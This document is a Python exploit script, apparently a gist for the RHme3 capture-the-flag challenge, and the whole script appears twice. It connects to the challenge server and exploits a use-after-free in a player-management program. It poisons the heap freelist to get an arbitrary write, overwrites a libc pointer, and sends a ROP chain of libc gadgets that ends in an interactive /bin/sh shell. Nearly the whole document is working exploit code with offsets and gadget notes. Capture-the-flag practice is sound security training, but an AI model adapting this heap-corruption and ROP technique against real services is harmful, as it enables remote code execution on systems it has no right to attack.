deanjerkovich/rhme3_exploit.py

## rhme3_exploit.py
#!/usr/bin/env python

import socket
import time
import telnetlib
import struct

LIBC_BASE = 0x7eff13bcb000
HEAP_BASE = 0x248b000

SLEEP_TIME = 1

t = telnetlib.Telnet()

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("pwn.rhme.riscure.com",1337))
#s.connect(("127.0.0.1",1337))

def doRecv():
  print "<< ", s.recv(1024)
  time.sleep(SLEEP_TIME)

def doSend(data):
  print ">> ", data
  s.send(data + "\n")
  time.sleep(SLEEP_TIME)
  doRecv()

blahfuck = raw_input('attach debugger and press enter..')

doRecv()
doSend("1")   # add our fake chunk player
doSend("fake")
doSend("33")
doSend("0")
doSend("33")
doSend("0")

doSend("1")
doSend("hax")   # add a player
doSend("1")
doSend("1")
doSend("1")
doSend("1")

doSend("3")     # get a pointer to it
doSend("1")

doSend("2")     # free underlying data
doSend("1")

doSend("4")
doSend("1")
# the below is a heap offset | this is 0x1620 offset from heap base.
# heap base == 0x1a34000
# offset: 0x1620
# == 0x1a35620
doSend(struct.pack('<L', HEAP_BASE + 0x1620))    # modify the freelist FD pointer to point at our fake chunk
doSend("0")

doSend("1")
doSend("A"*128)   # alloc a new player with a non-fastbin name to get uneven freelist
doSend("3")       # so our poisoned malloc is in response to the Name malloc
doSend("3")
doSend("3")
doSend("3")

doSend("1")
doSend("\x40\x30\x60")    # the malloc for this request will be serviced using our poisoned freelist, so will
doSend("4")       # return a pointer of our choosing. subsequent writes will be to a destination of
doSend("4")       # of our choosing
doSend("4")
doSend("4")

doSend("3")
doSend("0")

doSend("4")
doSend("1")

doSend(struct.pack('<Q', LIBC_BASE + 0x101f80))

doSend("1")

g1 = struct.pack('<Q', LIBC_BASE + 0x34a70)
g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78)
g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3)

s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n")

t.sock = s
t.interact()


# /bin/sh 0x7f50304e40f3   this is the one requiring RCX and R12 null | libc offset 0xcd0f3
# /bin/sh 0x7f503050d6c0

# 0x7f5030436b7b 0x1fb7b xor eax eax, ret
# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret
# 0x7f5030436b78 0x1fb78 pop r12, ret
	#!/usr/bin/env python

	import socket
	import time
	import telnetlib
	import struct

	LIBC_BASE = 0x7eff13bcb000
	HEAP_BASE = 0x248b000

	SLEEP_TIME = 1

	t = telnetlib.Telnet()

	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

	s.connect(("pwn.rhme.riscure.com",1337))
	#s.connect(("127.0.0.1",1337))

	def doRecv():
	print "<< ", s.recv(1024)
	time.sleep(SLEEP_TIME)

	def doSend(data):
	print ">> ", data
	s.send(data + "\n")
	time.sleep(SLEEP_TIME)
	doRecv()

	blahfuck = raw_input('attach debugger and press enter..')

	doRecv()
	doSend("1") # add our fake chunk player
	doSend("fake")
	doSend("33")
	doSend("0")
	doSend("33")
	doSend("0")

	doSend("1")
	doSend("hax") # add a player
	doSend("1")
	doSend("1")
	doSend("1")
	doSend("1")

	doSend("3") # get a pointer to it
	doSend("1")

	doSend("2") # free underlying data
	doSend("1")

	doSend("4")
	doSend("1")
	# the below is a heap offset \| this is 0x1620 offset from heap base.
	# heap base == 0x1a34000
	# offset: 0x1620
	# == 0x1a35620
	doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk
	doSend("0")

	doSend("1")
	doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist
	doSend("3") # so our poisoned malloc is in response to the Name malloc
	doSend("3")
	doSend("3")
	doSend("3")

	doSend("1")
	doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will
	doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of
	doSend("4") # of our choosing
	doSend("4")
	doSend("4")

	doSend("3")
	doSend("0")

	doSend("4")
	doSend("1")

	doSend(struct.pack('<Q', LIBC_BASE + 0x101f80))

	doSend("1")

	g1 = struct.pack('<Q', LIBC_BASE + 0x34a70)
	g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78)
	g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3)

	s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n")

	t.sock = s
	t.interact()


	# /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null \| libc offset 0xcd0f3
	# /bin/sh 0x7f503050d6c0

	# 0x7f5030436b7b 0x1fb7b xor eax eax, ret
	# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret
	# 0x7f5030436b78 0x1fb78 pop r12, ret